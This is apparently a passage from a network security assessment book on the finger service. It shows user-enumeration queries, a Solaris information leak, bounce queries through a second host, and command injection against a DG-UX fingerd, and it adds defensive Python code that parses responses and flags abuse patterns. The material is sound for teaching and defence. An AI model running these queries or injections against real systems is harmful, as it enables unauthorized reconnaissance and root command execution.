5.4 finger

The fingerd service is commonly found listening on TCP port 79 of Cisco IOS routers. Default out-of-box builds of many commercial Unix-based systems also run the service, including Solaris and BSDI.

The service can be queried using a finger client (found on most operating platforms) or by using telnet to connect directly to port 79. Two examples follow, showing how the results differ when querying a Cisco IOS device and a Solaris server.

Here's a finger query against a Cisco router using telnet:

# telnet 192.168.0.1 79
Trying 192.168.0.1...
Connected to 192.168.0.1.
Escape character is '^]'.

    Line     User      Host(s)                  Idle Location
*  1 vty 0             idle                 00:00:00 192.168.0.252
  Se0                  Sync PPP             00:00:00
Connection closed by foreign host.

Here the finger command queries a Solaris host:

# finger @192.168.0.10
[192.168.0.10]
Login       Name               TTY         Idle    When    Where
crm      Chris McNab           pts/0          1 Tue 09:08  onyx
axd      Andrew Done           pts/4         3d Thu 11:57  goofball

A null query will result in the current users being shown under most fingerd services. From analyzing the format of the response, you can easily differentiate between a Sun Solaris host and a Cisco IOS router.
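Added example, not from the book: a small Python parser that tells the two null-query response formats apart and extracts the table rows, as an audit script that inventories exposed finger services might. The sample responses are constructed from the two sessions above, and the row regexes assume the column layout shown there.

```python
import re

# Constructed sample null-query responses, modelled on the two sessions above
# (not captured from live hosts).
IOS_RESPONSE = """\
    Line     User      Host(s)                  Idle Location
*  1 vty 0             idle                 00:00:00 192.168.0.252
  Se0                  Sync PPP             00:00:00
"""
UNIX_RESPONSE = """\
[192.168.0.10]
Login       Name               TTY         Idle    When    Where
crm      Chris McNab           pts/0          1 Tue 09:08  onyx
axd      Andrew Done           pts/4         3d Thu 11:57  goofball
"""

# One row of the IOS line/session table; one row of the Unix login table.
IOS_ROW = re.compile(r"^(\*?)\s*(\d+ vty \d+|\S+)\s+(.*?)\s+(\d\d:\d\d:\d\d)\s*(\S*)$")
UNIX_ROW = re.compile(r"^(\S+)\s+(.*?)\s+(\S+)\s+(\S+)\s+(\w{3} \d\d:\d\d)\s+(\S+)$")

def parse_finger_response(text):
    """Return (platform, rows) for a null-query finger response.

    platform is 'cisco-ios', 'unix' or 'unknown'. rows holds one dict per
    table row so an audit can record what each exposed host discloses.
    Lines that do not fit the table (telnet banners, the [host] echo) are skipped.
    """
    lines = [l for l in text.splitlines() if l.strip() and not l.startswith("[")]
    if not lines:
        return "unknown", []
    header = lines[0].split()
    if header[:3] == ["Line", "User", "Host(s)"]:
        rows = [{"line": m[2], "host": m[3], "idle": m[4], "location": m[5]}
                for m in map(IOS_ROW.match, lines[1:]) if m]
        return "cisco-ios", rows
    if header[:2] == ["Login", "Name"]:
        rows = [{"login": m[1], "name": m[2], "tty": m[3], "where": m[6]}
                for m in map(UNIX_ROW.match, lines[1:]) if m]
        return "unix", rows
    return "unknown", []
```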

5.4.1 finger Information Leaks

Various information leak vulnerabilities exist in fingerd implementations. A popular attack involves issuing a '1 2 3 4 5 6 7 8 9 0' request against a Solaris host running fingerd. Example 5-9 highlights a bug present in all Solaris releases up to Version 8; it lets you identify user accounts on the target system.

Example 5-9. Gleaning user details through Solaris fingerd
# finger '1 2 3 4 5 6 7 8 9 0'@192.168.0.10
[192.168.0.10]
Login       Name               TTY         Idle    When    Where
root     Super-User            console      <Jun  3 17:22> :0
admin    Super-User            console      <Jun  3 17:22> :0
daemon          ???                         < .  .  .  . >
bin             ???                         < .  .  .  . >
sys             ???                         < .  .  .  . >
adm      Admin                              < .  .  .  . >
lp       Line Printer Admin                 < .  .  .  . >
uucp     uucp Admin                         < .  .  .  . >
nuucp    uucp Admin                         < .  .  .  . >
listen   Network Admin                      < .  .  .  . >
nobody   Nobody                             < .  .  .  . >
noaccess No Access User                     < .  .  .  . >
nobody4  SunOS 4.x Nobody                   < .  .  .  . >
informix Informix User                      < .  .  .  . >
crm      Chris McNab           pts/0          1 Tue 09:08  onyx
axd      Andrew Done           pts/4         3d Thu 11:57  goofball

Many Unix fingerd services perform a simple cross-reference operation of the query string against user information fields in the /etc/passwd file; the following finger command-line options can obtain useful information:

finger 0@target.host
finger .@target.host
finger **@target.host
finger user@target.host
finger test@target.host

Performing a finger user@target.host request is especially effective against Linux, BSD, Solaris, and other Unix systems, because it often reveals a number of user accounts, as shown in Example 5-10.

Example 5-10. Gathering user details through standard fingerd services
# finger user@192.168.189.12
Login: ftp                              Name: FTP User
Directory: /home/ftp                    Shell: /bin/sh
Never logged in.
No mail.
No Plan.

Login: samba                            Name: SAMBA user
Directory: /home/samba                  Shell: /bin/null
Never logged in.
No mail.
No Plan.

Login: test                             Name: test user
Directory: /home/test                   Shell: /bin/sh
Never logged in.
No mail.
No Plan.

5.4.2 finger Redirection

In some cases, servers running fingerd exist on multiple networks (such as the Internet and an internal network space). With knowledge of internal IP ranges and hostnames, you can perform a bounce attack to find internal usernames and host details as follows:

# finger @192.168.0.10@217.34.17.200
[217.34.217.200]
[192.168.0.10]
Login       Name               TTY         Idle    When    Where
crm      Chris McNab           pts/0          1 Tue 09:08  onyx
axd      Andrew Done           pts/4         3d Thu 11:57  goofball

5.4.3 Directly Exploitable finger Bugs

Poorly written fingerd implementations allow attackers to pipe commands through the service, which are, in turn, run on the target host by the owner of the service process (such as root or bin under Unix-based systems). Example 5-11 shows a vulnerable finger service running on a DG-UX platform being exploited to return the current user ID and network statistics.

Example 5-11. Executing commands through DG-UX fingerd
# finger "|/bin/id@192.168.0.135"
[192.168.0.135]
uid=0(root) gid=0(root)

# finger "|/bin/ls -a /@192.168.0.135"
[192.168.0.135]
total 7690
drwxr-xr-x  15 root  root       512 Jul 22  2002 .
drwxr-xr-x  15 root  root       512 Jul 22  2002 ..
drwxr-xr-x   2 root  bin       1024 Mar  1  2002 bin
-r-xr-xr-x   1 root  wheel    53248 Feb 19  2002 boot
drwxr-xr-x   4 root  wheel    15360 Jun 26 09:50 dev
drwxr-xr-x  18 root  wheel     2560 Oct 12 03:32 etc
drwxr-xr-x   9 root  wheel      512 Oct 12 03:25 home
drwxr-xr-x   4 root  wheel      512 Apr 10  2002 mnt
drwx------  24 root  root      1536 Jun 26 09:41 root
drwxr-xr-x   2 root  bin       2048 Oct 18  2001 sbin
drwxr-xr-x   2 root  wheel      512 Oct 18  2001 stand
lrwxr-xr-x   1 root  wheel       12 Mar 16  2002 sys -> /usr/src/sys
drwxrwxrwt   4 root  wheel      512 Oct 20 18:05 tmp
drwxr-xr-x  15 root  wheel      512 Oct 18  2001 usr
drwxr-xr-x  25 root  wheel      512 May 23  2002 var

Serious buffer overflow vulnerabilities exist in many Linux finger daemons, including cfingerd. At the time of writing, cfingerd 1.4.3 and prior running on Linux (particularly Debian and Red Hat Linux distributions) is especially susceptible to a plethora of remote and locally exploitable bugs. For current details of publicly available finger exploits, you can search Packet Storm for "finger exploit" or the MITRE CVE list at http://cve.mitre.org.
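Added example, not from the book: a Python classifier for inbound finger request lines that flags the three abuse patterns covered in 5.4.1 to 5.4.3 (enumeration queries such as the null, numeric and wildcard forms, redirection through a second host, and shell metacharacters aimed at a command-piping bug), suitable for a wrapper in front of fingerd or for a sensor that logs port 79 traffic. The generic-name list is an assumption to tune locally, and the sample queries are constructed from the strings shown in this section.

```python
import re

# Labels for the three abuse patterns this section describes.
ENUMERATION = "enumeration"              # null, numeric or wildcard user lists
REDIRECTION = "redirection"              # user@inner-host@finger-host bounce
COMMAND_INJECTION = "command-injection"  # shell metacharacters passed to fingerd

# Assumption: generic login names worth flagging; tune for your environment.
GENERIC_NAMES = {"user", "test", "admin", "guest"}

# Constructed sample request lines (the text a client sends on port 79),
# including the query strings shown in this section.
SAMPLE_QUERIES = [
    "crm@192.168.0.10",
    "@192.168.0.10",
    "1 2 3 4 5 6 7 8 9 0@192.168.0.10",
    "**@192.168.0.10",
    "@192.168.0.10@217.34.17.200",
    "|/bin/id@192.168.0.135",
]

def classify_finger_query(query):
    """Return the set of labels that apply to one finger request line.
    An empty set means an ordinary single-user lookup.
    """
    q = re.sub(r"^/W\s*", "", query.rstrip("\r\n"))  # drop RFC 1288 /W switch
    labels = set()
    if re.search(r"[|;&`$<>]", q):                   # never valid in a login
        labels.add(COMMAND_INJECTION)
    if q.count("@") > 1:                             # asks the host to forward
        labels.add(REDIRECTION)
    user = q.split("@", 1)[0].strip()
    if (user == "" or user in GENERIC_NAMES
            or re.fullmatch(r"[\d\s]+", user)        # '1 2 3 ... 0' and '0'
            or set(user) <= set("*.?")):             # '.', '**' wildcards
        labels.add(ENUMERATION)
    return labels

def scan_queries(queries):
    """Return {query: sorted labels} for every flagged request line."""
    result = {}
    for q in queries:
        labels = classify_finger_query(q)
        if labels:
            result[q] = sorted(labels)
    return result
```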



     
    ASPTreeView.com
     
    Evaluation has »ЖК¶іјіµexpired.
    Info...